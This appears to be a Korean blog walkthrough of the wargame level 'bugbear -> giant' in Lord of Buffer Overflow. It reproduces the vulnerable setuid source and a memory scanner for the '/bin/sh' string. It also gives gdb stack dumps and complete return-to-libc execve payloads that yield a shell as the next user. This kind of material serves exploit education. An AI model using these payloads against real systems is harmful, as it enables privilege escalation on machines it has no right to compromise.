[14] bugbear -> giant ( RTL , execve )

2017. 11. 20. 21:08 · SystemHacking/LOB(BOF원정대)


bugbear / new divide

[bugbear@localhost bugbear]$ /bin/bash2

[bugbear@localhost bugbear]$ export SHELL=/bin/bash2



[ giant.c ]

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
 
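/*
 * LOB level "giant" -- the vulnerable setuid target, reproduced from the
 * challenge source.  The only code change here is restoring the ", "
 * argument separators that the page extraction dropped (the popen() and
 * sscanf() calls would not compile without them).
 *
 * What the binary does:
 *   1. Resolves execve()'s absolute address in libc at run time
 *      (libc load base from `ldd` + __execve symbol offset from `nm`).
 *   2. Refuses to run unless argv[1][44..47] equals that address, i.e. the
 *      attacker must overwrite main's saved eip with &execve
 *      (40-byte buffer + 4-byte saved ebp = offset 44).
 *   3. strcpy()s argv[1] into the 40-byte stack buffer -- the intended
 *      overflow.  Returning into execve() with its three arguments laid out
 *      above the saved eip is the expected solve (return-into-libc).
 *
 * argv[1]: attacker-controlled payload.  Return value: falls off the end
 * (implicit-int main, exactly as in the original source).
 */
main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        /* gain address of execve: the libc base comes from ldd on the next
         * level's binary (it links the same libc.so.6), the symbol offset
         * from nm on libc itself.  Both values are parsed from shell output. */
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        /* 255 > sizeof(buffer): harmless for ldd's one short line, but an
         * overflow bug in its own right; fgets()/sscanf() results are never
         * checked, so a failed pipe leaves lib_addr uninitialised. */
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);     /* a popen() stream should be pclose()d; kept as in the challenge source */

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        /* The check reads bytes 44..47 of argv[1] -- the bytes that land on
         * main's saved eip once the copy below overflows.  If argv[1] is
         * shorter than 48 bytes this reads past its terminator into whatever
         * follows it on the stack. */
        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        /* Intended vulnerability: unbounded copy into buffer[40]. */
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}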
 



[ 코드 설명 ]

* execve의 라이브러리 내의 주소를 구하는 코드 — giant 는 ldd 로 얻은 libc 로드 주소에 nm 으로 얻은 __execve 심볼 오프셋을 더해 execve 의 절대 주소를 만든다. 아래에서 같은 두 명령을 직접 실행하면 0x40018000 + 0x00091d48 = 0x400a9d48 이 나오며, 이 값이 argv[1] 의 44~47 번째 바이트에 들어가야 "You must use execve!" 검사를 통과한다. (소스는 /home/giant/assassin 에 ldd 를 걸지만, 같은 libc.so.6 을 쓰는 giant 바이너리로 돌려도 같은 로드 주소가 나온다 — 아래 gdb 덤프에서 검사를 통과한 값과 일치한다.)

[bugbear@localhost bugbear]$ /usr/bin/ldd /home/bugbear/giant | /bin/grep libc | /bin/awk '{print $4}'

(0x40018000)

[bugbear@localhost bugbear]$ /usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'

00091d48

[bugbear@localhost bugbear]$ cp giant.c giant2.c

[bugbear@localhost bugbear]$ gcc -o giant2 giant2.c


* execve

int execve (const char *filename, char *const argv [], char *const envp[]);

=> execve( &"/bin/sh" , &{ &"/bin/sh" , NULL } , envp ) — 첫 인자는 libc 안에 있는 "/bin/sh" 문자열의 주소, 두 번째 인자는 { &"/bin/sh" , NULL } 포인터 배열의 주소이므로 이 배열은 페이로드 안에(스택 위에) 직접 만들어 두고 그 주소를 넘긴다. 세 번째 envp 는 NULL 이거나 NULL 로 끝나는 빈 배열의 주소이면 된다 (아래 페이로드는 후자: 0 이 들어 있는 스택 주소를 넘긴다).


[ Stack 구조 ]

....

buffer          40byte        "A" * 40              (44개의 A 중 앞 40바이트)

saved ebp     (ebp)          "AAAA"                (나머지 4바이트)

saved eip     (ebp+4)        &execve               (argv[1][44..47] — giant 의 검사 지점)

ebp+8                        "AAAA"                (execve 가 자기 return address 로 보는 자리, dummy)

ebp+12                       argv1 ( &"/bin/sh" )

ebp+16                       argv2 ( &{ &"/bin/sh" , NULL } )

ebp+20                       argv3 ( envp — NULL 로 끝나는 빈 배열의 주소 )



[ 메모리 상의 " /bin/sh " 문자열 찾기 ]

#include <stdio.h>
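/*
 * Locate a NUL-terminated "/bin/sh" string in memory so its address can be
 * passed to execve() as the path argument.
 *
 * Scans forward one byte at a time from a hard-coded start address
 * (presumably chosen inside the libc mapping, whose base was 0x40018000 on
 * the LOB box) and compares 8 bytes, so the terminating NUL is part of the
 * match and a longer string such as "/bin/shell" is rejected.
 *
 * Fixes versus the page's listing: the ", " separator dropped from the
 * memcmp() call is restored, and the address is cast to char * before being
 * printed with %s (passing a long to %s is undefined behaviour).
 *
 * Caveats: the scan is unbounded -- if no match exists before the end of the
 * mapped region the process faults instead of reporting failure -- and the
 * result is only valid for the exact libc build the target process maps.
 */
int main (int argc, char* argv[]) {

        long shell;
        shell = 0x40058ae0;
        /* 8 bytes = "/bin/sh" plus its NUL terminator. */
        while(memcmp((void *) shell, "/bin/sh", 8)) {
                shell++;
        }

        printf("\"/bin/sh\" is at 0x%lx\n", shell);
        /* Echo the string found there as a sanity check that the match is real. */
        printf("printf %s\n", (char *) shell);

        return 0;

}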
 
 


[bugbear@localhost /tmp]$ ./find

"/bin/sh" is at 0x400fbff9

printf /bin/sh


[ gdb 접근 ]

0x8048688 <main+296>:   leave

0x8048689 <main+297>:   ret

End of assembler dump.

(gdb)

(gdb) b *0x8048688

Breakpoint 1 at 0x8048688

(gdb) run "$(python -c 'print "A" * 44 + "\x48\x9d\x0a\x40" + "AAAA" + "\xf9\xbf\x0f\x40" + "\xe8\xfa\xff\xbf" + "\xec\xfa\xff\xbf"+ "BBBB" * 14 +"\xf9\xbf\x0f\x40"')"

Starting program: /home/bugbear/giant2 "$(python -c 'print "A" * 44 + "\x48\x9d\x0a\x40" + "AAAA" + "\xf9\xbf\x0f\x40" + "\xe8\xfa\xff\xbf" + "\xec\xfa\xff\xbf"+ "BBBB" * 14 +"\xf9\xbf\x0f\x40"')"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH▒

@AAAA▒@▒▒▒▒▒▒▒▒BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB▒@


Breakpoint 1, 0x8048688 in main ()

(gdb) x/24x $ebp-40

0xbffffa70:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffa80:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffa90:     0x41414141      0x41414141      0x41414141      0x400a9d48  <-- &execve

     argv1                    argv2                  argv3

0xbffffaa0:     0x41414141      0x400fbff9      0xbffffae8      0xbffffaec

0xbffffab0:     0x42424242      0x42424242      0x42424242      0x42424242

0xbffffac0:     0x42424242      0x42424242      0x42424242      0x42424242

0xbffffad0:     0x42424242      0x42424242      0x42424242      0x42424242

0xbffffae0:     0x42424242      0x42424242      0x400fbff9      0x00000000

0xbffffaf0:     0xbffffc6f      0xbffffc81      0xbffffc9a      0xbffffcb9

0xbffffb00:     0xbffffcdb      0xbffffce8      0xbffffeab      0xbffffeca

0xbffffb10:     0xbffffee7      0xbffffefc      0xbfffff1b      0xbfffff26


main함수의 ret : pop eip => saved eip 자리에 넣어 둔 &execve (0x400a9d48) 로 점프하므로 execve() 가 실행된다.
leave / ret 뒤 esp 는 ebp+8 을 가리키므로 execve 는 ebp+8 의 AAAA 를 자기 return address 로 보고, 인자는 그 위 ebp+12 , ebp+16 , ebp+20 (위 덤프의 0xbffffaa4 / 0xbffffaa8 / 0xbffffaac) 에서 읽는다. 0xbffffae8 에는 { 0x400fbff9 , 0 } 즉 { &"/bin/sh" , NULL } 배열이, 0xbffffaec 에는 0 (빈 envp 배열) 이 놓여 있다.

=> execve( &"/bin/sh" , &{ &"/bin/sh" , NULL } , &{ NULL } )


[ payload 작성 ]


[bugbear@localhost bugbear]$ ./giant "$(python -c 'print "A" * 44 + "\x48\x9d\x0a\x40" + "AAAA" + "\xf9\xbf\x0f\x40" + "\xe8\xfa\xff\xbf" + "\xec\xfa\xff\xbf"+ "BBBB" * 14 +"\xf9\xbf\x0f\x40"')"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH▒

@AAAA▒@▒▒▒▒▒▒▒▒BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB▒@

Segmentation fault


=> 보정작업 : gdb 안에서 확인한 argv / envp 배열 주소 (0xbffffae8 / 0xbffffaec) 는 실제 실행 시에는 맞지 않는다 — gdb 는 실행 파일 경로·환경변수 등을 다르게 올려 스택이 조금 밀리기 때문에, 위 페이로드를 그대로 쓰면 execve 가 엉뚱한 주소를 argv / envp 로 읽어 Segmentation fault 가 난다. 이 환경에서는 두 주소를 0x10 만큼 올린 0xbffffaf8 / 0xbffffafc 로 맞추면 된다 (환경이 바뀌면 보정값도 달라지므로 실행 결과를 보며 다시 맞춰야 한다).

[bugbear@localhost bugbear]$ ./giant "$(python -c 'print "A" * 44 + "\x48\x9d\x0a\x40" + "AAAA" + "\xf9\xbf\x0f\x40" + "\xf8\xfa\xff\xbf" + "\xfc\xfa\xff\xbf"+ "BBBB" * 14 +"\xf9\xbf\x0f\x40"')"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH▒

@AAAA▒@▒▒▒▒▒▒▒▒BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB▒@

bash$ id

uid=513(bugbear) gid=513(bugbear) euid=514(giant) egid=514(giant) groups=513(bugbear)

bash$ my-pass

euid = 514

one step closer

bash$ whoami

giant